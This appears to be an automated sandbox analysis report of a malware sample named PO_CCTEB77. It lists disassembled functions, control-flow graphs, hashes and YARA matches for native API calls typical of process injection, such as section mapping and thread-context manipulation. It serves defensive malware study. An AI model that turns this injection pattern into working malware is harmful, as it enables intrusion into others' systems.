                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID: %o@$%o@
                                                                            • API String ID: 947044025-618112537
                                                                            • Opcode ID: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                            • Instruction ID: a180d3cde8570c79af263549b5a123663d1f596594efc184d6facc428f3df757
                                                                            • Opcode Fuzzy Hash: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                            • Instruction Fuzzy Hash: EA715D75E04258DFCB04CFA9D484AEDBBF1BF49304F1880AAE459B7341D238A952DF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040A733 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 100 40a733-40a74f 101 40a755-40a794 call 4097d3 100->101 102 40a750 call 4097c3 100->102 105 40a872-40a89b NtCreateSection 101->105 106 40a79a-40a7df call 409863 call 42b882 call 409733 call 42b882 101->106 102->101 107 40a8a1-40a8a8 105->107 108 40a938-40a944 105->108 128 40a7ea-40a7f0 106->128 110 40a8b3-40a8b9 107->110 112 40a8e1-40a8e5 110->112 113 40a8bb-40a8df 110->113 116 40a927-40a935 call 409863 112->116 117 40a8e7-40a8ee 112->117 113->110 116->108 120 40a8f9-40a8ff 117->120 120->116 123 40a901-40a925 120->123 123->120 129 40a7f2-40a816 128->129 130 40a818-40a81c 128->130 129->128 130->105 131 40a81e-40a839 130->131 133 40a844-40a84a 131->133 133->105 134 40a84c-40a870 133->134 134->133
                                                                            APIs
                                                                            • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A88E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateSection
                                                                            • String ID: An@
                                                                            • API String ID: 2449625523-62601564
                                                                            • Opcode ID: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                            • Instruction ID: 41a694da47314c6f7953bebff27000536f1853d4fe1618860b860f471416e69f
                                                                            • Opcode Fuzzy Hash: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                            • Instruction Fuzzy Hash: 36713BB1E04258DFCB04DFA9C490AEDBBF5BF49304F18816AE859B7341D238AA52CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040AB73 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 145 40ab73-40abd4 call 4097c3 call 4097d3 150 40acb2-40aceb NtCreateFile 145->150 151 40abda-40ac1f call 409863 call 42b882 call 409733 call 42b882 145->151 153 40acf1-40acf8 150->153 154 40ad88-40ad94 150->154 173 40ac2a-40ac30 151->173 156 40ad03-40ad09 153->156 158 40ad31-40ad35 156->158 159 40ad0b-40ad2f 156->159 162 40ad77-40ad85 call 409863 158->162 163 40ad37-40ad3e 158->163 159->156 162->154 166 40ad49-40ad4f 163->166 166->162 169 40ad51-40ad75 166->169 169->166 174 40ac32-40ac56 173->174 175 40ac58-40ac5c 173->175 174->173 175->150 177 40ac5e-40ac79 175->177 178 40ac84-40ac8a 177->178 178->150 179 40ac8c-40acb0 178->179 179->178
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040ACDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                            • Instruction ID: 1c07fbbcbdb6f1aea2f7691a6cf0475e8e686830d361e3a4b3f409b1fbea8beb
                                                                            • Opcode Fuzzy Hash: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                            • Instruction Fuzzy Hash: BB814DB1E14258DFCB04CFA9C490AEDBBF5AF4D304F18816AE859B7341D238A952CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040A953 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 181 40a953-40a9b4 call 4097c3 call 4097d3 186 40aa92-40aac7 NtMapViewOfSection 181->186 187 40a9ba-40a9ff call 409863 call 42b882 call 409733 call 42b882 181->187 188 40ab64-40ab70 186->188 189 40aacd-40aad4 186->189 209 40aa0a-40aa10 187->209 192 40aadf-40aae5 189->192 194 40aae7-40ab0b 192->194 195 40ab0d-40ab11 192->195 194->192 198 40ab53-40ab61 call 409863 195->198 199 40ab13-40ab1a 195->199 198->188 201 40ab25-40ab2b 199->201 201->198 204 40ab2d-40ab51 201->204 204->201 210 40aa12-40aa36 209->210 211 40aa38-40aa3c 209->211 210->209 211->186 213 40aa3e-40aa59 211->213 214 40aa64-40aa6a 213->214 214->186 215 40aa6c-40aa90 214->215 215->214
                                                                            APIs
                                                                            • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AABA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: SectionView
                                                                            • String ID:
                                                                            • API String ID: 1323581903-0
                                                                            • Opcode ID: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                            • Instruction ID: 8c108c30a1503a35fa8a721594d6fd6207328e0511ed23d5626443ae9fe78b90
                                                                            • Opcode Fuzzy Hash: 42e425ea6a7462443631d8b6a0a837e093257fc2e9c0202ad7f6345b11b57f9c
                                                                            • Instruction Fuzzy Hash: FE713A71E04258DFCB04CFA9C590AEDBBF6AF4D304F18816AE459B7381D238A952CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040ADA3 Relevance: 1.7, APIs: 1, Instructions: 184filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 217 40ada3-40adbf 218 40adc5-40ae04 call 4097d3 217->218 219 40adc0 call 4097c3 217->219 222 40aee2-40af13 NtReadFile 218->222 223 40ae0a-40ae4f call 409863 call 42b882 call 409733 call 42b882 218->223 219->218 224 40afb0-40afbc 222->224 225 40af19-40af20 222->225 245 40ae5a-40ae60 223->245 227 40af2b-40af31 225->227 229 40af33-40af57 227->229 230 40af59-40af5d 227->230 229->227 234 40af9f-40afad call 409863 230->234 235 40af5f-40af66 230->235 234->224 238 40af71-40af77 235->238 238->234 241 40af79-40af9d 238->241 241->238 246 40ae62-40ae86 245->246 247 40ae88-40ae8c 245->247 246->245 247->222 248 40ae8e-40aea9 247->248 250 40aeb4-40aeba 248->250 250->222 251 40aebc-40aee0 250->251 251->250
                                                                            APIs
                                                                            • NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040AF06
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                            • Instruction ID: fc9d2199742c9a8d060674d21e47953af395a2044174ee8fd2e3237901ead3e6
                                                                            • Opcode Fuzzy Hash: 85a89d8992471b92ffb2d43eef22a062ed743e0913ce14f7d9fa0da6e664859a
                                                                            • Instruction Fuzzy Hash: DB713DB1E14258DFCB04CFA9C490AEDBBF5BF4D304F18816AE459B7341D234A952CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B623 Relevance: 1.7, APIs: 1, Instructions: 178memorynativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 253 40b623-40b684 call 4097c3 call 4097d3 258 40b762-40b787 NtAllocateVirtualMemory 253->258 259 40b68a-40b6cf call 409863 call 42b882 call 409733 call 42b882 253->259 260 40b824-40b830 258->260 261 40b78d-40b794 258->261 281 40b6da-40b6e0 259->281 263 40b79f-40b7a5 261->263 265 40b7a7-40b7cb 263->265 266 40b7cd-40b7d1 263->266 265->263 269 40b813-40b821 call 409863 266->269 270 40b7d3-40b7da 266->270 269->260 272 40b7e5-40b7eb 270->272 272->269 275 40b7ed-40b811 272->275 275->272 282 40b6e2-40b706 281->282 283 40b708-40b70c 281->283 282->281 283->258 285 40b70e-40b729 283->285 286 40b734-40b73a 285->286 286->258 287 40b73c-40b760 286->287 287->286
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0040B77A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                            • Instruction ID: f26121f830c0f8109234ac70a2951215a16cc0557d90fb1a5981705e0bebb243
                                                                            • Opcode Fuzzy Hash: fadf59258bf36b7a3c0f85c6cf86162f688c6e76b45417ae3e42d9c532fb0ac8
                                                                            • Instruction Fuzzy Hash: 9B712A75E14158DFCB04CFA9C490AEDBBF5AF89304F18806AE459B7391D338A942CF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040A123 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 361 40a123-40a184 call 4097c3 call 4097d3 366 40a262-40a277 NtSetContextThread 361->366 367 40a18a-40a1cf call 409863 call 42b882 call 409733 call 42b882 361->367 369 40a314-40a320 366->369 370 40a27d-40a284 366->370 389 40a1da-40a1e0 367->389 372 40a28f-40a295 370->372 374 40a297-40a2bb 372->374 375 40a2bd-40a2c1 372->375 374->372 378 40a303-40a311 call 409863 375->378 379 40a2c3-40a2ca 375->379 378->369 381 40a2d5-40a2db 379->381 381->378 384 40a2dd-40a301 381->384 384->381 390 40a1e2-40a206 389->390 391 40a208-40a20c 389->391 390->389 391->366 393 40a20e-40a229 391->393 394 40a234-40a23a 393->394 394->366 395 40a23c-40a260 394->395 395->394
                                                                            APIs
                                                                            • NtSetContextThread.NTDLL(?,?), ref: 0040A26A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                            • Instruction ID: 9b1aa35c00d12f4d4ec830877887629837b7e68d82d172a387a58b949419f852
                                                                            • Opcode Fuzzy Hash: 8e1b16207460c74ecb583fa993db847e50e0fae833e5e0f8ab41b91e0412513e
                                                                            • Instruction Fuzzy Hash: 32714D71E04258DFCB04CFA9C490AEDBBF1BF49304F1880AAE859B7381D239A952DF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B213 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 397 40b213-40b22f 398 40b235-40b274 call 4097d3 397->398 399 40b230 call 4097c3 397->399 402 40b352-40b368 NtDelayExecution 398->402 403 40b27a-40b2bf call 409863 call 42b882 call 409733 call 42b882 398->403 399->398 404 40b405-40b411 402->404 405 40b36e-40b375 402->405 425 40b2ca-40b2d0 403->425 407 40b380-40b386 405->407 410 40b388-40b3ac 407->410 411 40b3ae-40b3b2 407->411 410->407 414 40b3f4-40b402 call 409863 411->414 415 40b3b4-40b3bb 411->415 414->404 417 40b3c6-40b3cc 415->417 417->414 420 40b3ce-40b3f2 417->420 420->417 426 40b2d2-40b2f6 425->426 427 40b2f8-40b2fc 425->427 426->425 427->402 429 40b2fe-40b319 427->429 430 40b324-40b32a 429->430 430->402 431 40b32c-40b350 430->431 431->430
                                                                            APIs
                                                                            • NtDelayExecution.NTDLL(0041A6B1,?,?,?,00000000), ref: 0040B35B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DelayExecution
                                                                            • String ID:
                                                                            • API String ID: 1249177460-0
                                                                            • Opcode ID: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                            • Instruction ID: 3be60250fe5fbc5b7b76b1735ee417b9946c579d890d9e13bfe27a8a66749d08
                                                                            • Opcode Fuzzy Hash: b72b665b74fb54d89f454fa359837e64855619780894ba6584d0cb01522ea78b
                                                                            • Instruction Fuzzy Hash: 09712E71D14158DBCB05CFA9C490AEDBBF1EF49304F1880AAE859B7341D738AA41DF98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409D23 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 289 409d23-409d84 call 4097c3 call 4097d3 294 409e62-409e77 NtSuspendThread 289->294 295 409d8a-409dcf call 409863 call 42b882 call 409733 call 42b882 289->295 296 409f14-409f20 294->296 297 409e7d-409e84 294->297 317 409dda-409de0 295->317 299 409e8f-409e95 297->299 301 409e97-409ebb 299->301 302 409ebd-409ec1 299->302 301->299 304 409f03-409f11 call 409863 302->304 305 409ec3-409eca 302->305 304->296 308 409ed5-409edb 305->308 308->304 311 409edd-409f01 308->311 311->308 318 409de2-409e06 317->318 319 409e08-409e0c 317->319 318->317 319->294 321 409e0e-409e29 319->321 322 409e34-409e3a 321->322 322->294 323 409e3c-409e60 322->323 323->322
                                                                            APIs
                                                                            • NtSuspendThread.NTDLL(?,?), ref: 00409E6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: SuspendThread
                                                                            • String ID:
                                                                            • API String ID: 3178671153-0
                                                                            • Opcode ID: adcfe1a8fc1bb45aaabbcc311c2c61f2764369a01feb8d5aeeaa2fe2c21b4f98
                                                                            • Instruction ID: e47e113cf92a57b1ac52dd662de8fcc24e3456a203539e49cba6bfabcd542c9a
                                                                            • Opcode Fuzzy Hash: adcfe1a8fc1bb45aaabbcc311c2c61f2764369a01feb8d5aeeaa2fe2c21b4f98
                                                                            • Instruction Fuzzy Hash: 55711C71E14158DFCB04CFA9C490AEDBBF5AF49314F18806AE459B7382D638AD42DB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409F23 Relevance: 1.7, APIs: 1, Instructions: 170nativethreadCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 325 409f23-409f84 call 4097c3 call 4097d3 330 40a062-40a077 NtGetContextThread 325->330 331 409f8a-409fcf call 409863 call 42b882 call 409733 call 42b882 325->331 332 40a114-40a120 330->332 333 40a07d-40a084 330->333 353 409fda-409fe0 331->353 336 40a08f-40a095 333->336 337 40a097-40a0bb 336->337 338 40a0bd-40a0c1 336->338 337->336 341 40a103-40a111 call 409863 338->341 342 40a0c3-40a0ca 338->342 341->332 345 40a0d5-40a0db 342->345 345->341 348 40a0dd-40a101 345->348 348->345 354 409fe2-40a006 353->354 355 40a008-40a00c 353->355 354->353 355->330 357 40a00e-40a029 355->357 358 40a034-40a03a 357->358 358->330 359 40a03c-40a060 358->359 359->358
                                                                            APIs
                                                                            • NtGetContextThread.NTDLL(?,?), ref: 0040A06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                            • Instruction ID: cb0abd5b403f6b9fc28d3a6aa314449394bfc664419b332a47aa0db7b876805e
                                                                            • Opcode Fuzzy Hash: c486c64c00cd5f5b8c72e1e55815e763dc87eb2ab1f6ce2e21a35978956b8d16
                                                                            • Instruction Fuzzy Hash: 52714C71E0425CDFCB04CFA9C490AEDBBF1AF49304F1880AAE459B7381D239AA52CF55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004173F3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 433 4173f3-41740f 434 417417-41741c 433->434 435 417412 call 42af83 433->435 436 417422-417430 call 42b4a3 434->436 437 41741e-417421 434->437 435->434 440 417440-417451 call 429943 436->440 441 417432-41743d call 42b723 436->441 446 417453-417467 LdrLoadDll 440->446 447 41746a-41746d 440->447 441->440 446->447
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00417465
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction ID: 1361856df78bc134776308968c2a22ed589fa1034180a1cbb88d919f5dfdd5b0
                                                                            • Opcode Fuzzy Hash: 1fcb73fbd77ef36cb2ce4409c10369b23ff0cc34926120964a4f0ebcc4b86230
                                                                            • Instruction Fuzzy Hash: 85011EB5E4020DABDB10DAA5ED42FDEB7789B54308F00819AE90897241F635EB588B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00428453 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(0041A658,?,?,00000000,?,0041A658,?,?,?,?,?,?,?,?,00000000,?), ref: 0042848A
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction ID: 8f31afb53f65978ff8a5df44bbc3e5722fab298bbb2beb57612707ad3f89b0d5
                                                                            • Opcode Fuzzy Hash: 95eb5ec58ed36a9217d741a15508274ea77d94a2defe0925d6dabe828dc0a160
                                                                            • Instruction Fuzzy Hash: 0EE086712106147BD120FA5ADC41F97B76CEFC6715F40801AFA08AB242C670790587F5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                            • Instruction ID: 01b5e32267ecf2c87cfa22f83328561b82f04bdbe8204e38853a35196788a857
                                                                            • Opcode Fuzzy Hash: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                            • Instruction Fuzzy Hash: 2190026324240007410571584415616500E97E2301B55C021E2018590DC6258A956226
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9c85606f968a1ea323f6cb81995a01020675cf80c102e57d79822758e7f0e82a
                                                                            • Instruction ID: 1575940be21992e1347ccf908c99fcb9998a9e118374d73e8dde543702f1da35
                                                                            • Opcode Fuzzy Hash: 9c85606f968a1ea323f6cb81995a01020675cf80c102e57d79822758e7f0e82a
                                                                            • Instruction Fuzzy Hash: 9F90023324140417D11171584505707100D97D2341F95C412A1428558DD7568B56A222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01802C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3237626a83325ceddc1134234edb77cb2cf9142715f2e338373abb9aa6705451
                                                                            • Instruction ID: 7cfee75088f2314e818a42fe45221fb139b1fb55e5fe668bbc50c5b9921b7469
                                                                            • Opcode Fuzzy Hash: 3237626a83325ceddc1134234edb77cb2cf9142715f2e338373abb9aa6705451
                                                                            • Instruction Fuzzy Hash: 8190023324148807D1107158840574A100997D2301F59C411A5428658DC7958A957222
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 018035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2155052437.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_1790000_PO_CCTEB77.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 33df94f2eb2992f4a0880b0303108024c3fa7464ace7bd520e0a1cc3572307a1
                                                                            • Instruction ID: ed6901184416b9e963f5133572b8691055b0cbf8a80e85abd67577509dbe4070
                                                                            • Opcode Fuzzy Hash: 33df94f2eb2992f4a0880b0303108024c3fa7464ace7bd520e0a1cc3572307a1
                                                                            • Instruction Fuzzy Hash: BF90023364550407D10071584515706200997D2301F65C411A1428568DC7958B5566A3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00413A8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 36 413a8d-413a90 37 413b01-413b02 36->37 38 413a92 36->38 39 413a93-413aa2 38->39 40 413ac9-413aca 38->40 41 413aa4-413aac 39->41 42 413a4f-413a52 39->42 40->39 43 413acc-413ace 40->43 44 413adf 41->44 43->44 45 413af4-413b42 43->45 47 413ae1-413ae6 44->47 48 413ae8-413aee 44->48 51 413b54-413b5d 45->51 52 413b44-413b4c 45->52 47->48 49 413af0-413af3 48->49 50 413b6f-413b8b 48->50 49->45 53 413bfd-413c5d call 42a323 call 42ad33 call 4173f3 call 4046e3 call 423e53 50->53 54 413b8d-413bea 50->54 51->50 52->51 68 413c7d-413c83 53->68 69 413c5f-413c6e PostThreadMessageW 53->69 69->68 70 413c70-413c7a 69->70 70->68
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 0-4105805501
                                                                            • Opcode ID: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                            • Instruction ID: cd7b0ebc4f312fe051f5a44f46a53db313936eba4b75457889bdb1bd7ecce334
                                                                            • Opcode Fuzzy Hash: d45de8c7b50298374bac702908ff5e65982283c5d550219a6107e280cf31b49d
                                                                            • Instruction Fuzzy Hash: BC41C333549289AEC7029F745C415DEBF78EE81365B5841DFE4809B503D22A5B87C7C6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00413BEB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 71 413beb-413c05 73 413c0d-413c5d call 42ad33 call 4173f3 call 4046e3 call 423e53 71->73 74 413c08 call 42a323 71->74 83 413c7d-413c83 73->83 84 413c5f-413c6e PostThreadMessageW 73->84 74->73 84->83 85 413c70-413c7a 84->85 85->83
                                                                            APIs
                                                                            • PostThreadMessageW.USER32(7e327r58,00000111,00000000,00000000), ref: 00413C6A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2154396659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_PO_CCTEB77.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: 7e327r58$7e327r58
                                                                            • API String ID: 1836367815-4105805501
                                                                            • Opcode ID: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                            • Instruction ID: 5cd8f1ba56ca66e7765762b9b338afedcaf28b67fd49832bfc28183128bb71e6
                                                                            • Opcode Fuzzy Hash: adcceddb6a4681dd82a74107d39f3fbb2828151b626a08a6d540b20f6b9e8212
                                                                            • Instruction Fuzzy Hash: AE01A572D0015C7ADB10AAE19C81DEFBB7CDF41798F408169FE1467240E57C4F468BA5
                                                                            Uniqueness

